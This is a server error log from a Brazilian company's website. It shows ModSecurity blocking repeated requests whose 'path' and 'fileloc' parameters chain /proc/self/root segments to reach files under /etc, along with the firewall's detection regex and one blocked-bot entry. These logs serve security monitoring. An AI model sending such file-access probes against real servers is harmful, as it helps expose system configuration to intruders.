https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:43.281763 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.241.46:51540] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflqxXjF1vJNtV6CWrefQAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:45.674614 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:51552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflrbysWC90G-1nBrAplAAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:49.030378 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.241.46:51560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflsXbQATo66fKoS7wuHQAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:50.243227 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.244.31:42470] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abflsv9ocpUE4ed4uDzScgAAAhI"]
[Mon Mar 16 08:12:51.339106 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:46104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfls7ysWC90G-1nBrApmgAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:59.689240 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:60924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflu_9ocpUE4ed4uDzSegAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:13:56.388491 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:46112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl9HjZBu2q05ozVU840wAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:13:57.693592 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.241.46:40926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl9XbQATo66fKoS7wuIwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:13:58.894488 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:51590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl9rABkC4fWIHEf8HPZgAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:00.191931 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:51596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl-Jqj1wV0Si-OkefNBQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:01.375337 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:51608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl-Zqj1wV0Si-OkefNBgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:02.555032 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:51618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl-o6lpbStxTqkSktRYAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:03.845218 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:51622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl-_9ocpUE4ed4uDzSgQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:07.045031 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.241.46:51626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfl_xXjF1vJNtV6CWreiAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:08.320716 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:58298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmANSswJuvopo3lOhEwAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:08.827629 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:36348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmAAlT9VtDQc7bgUyLpQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:09.472546 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.241.46:58306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmAXjZBu2q05ozVU841AAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:10.819846 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:58322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmAo6lpbStxTqkSktRZAAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:11.129908 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:59082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmA46lpbStxTqkSktRZQAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:12.141018 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:58336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmBHbQATo66fKoS7wuJgAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:12.458487 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:33728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmBLysWC90G-1nBrAp4gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:13.462739 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:58344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmBQlT9VtDQc7bgUyLpgAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:14.756744 2026] [:error] [pid 10709:tid 140411716749056] [client 74.7.241.46:58358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmBhXjF1vJNtV6CWreiQAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:14.794963 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:33738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmBglT9VtDQc7bgUyLqAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
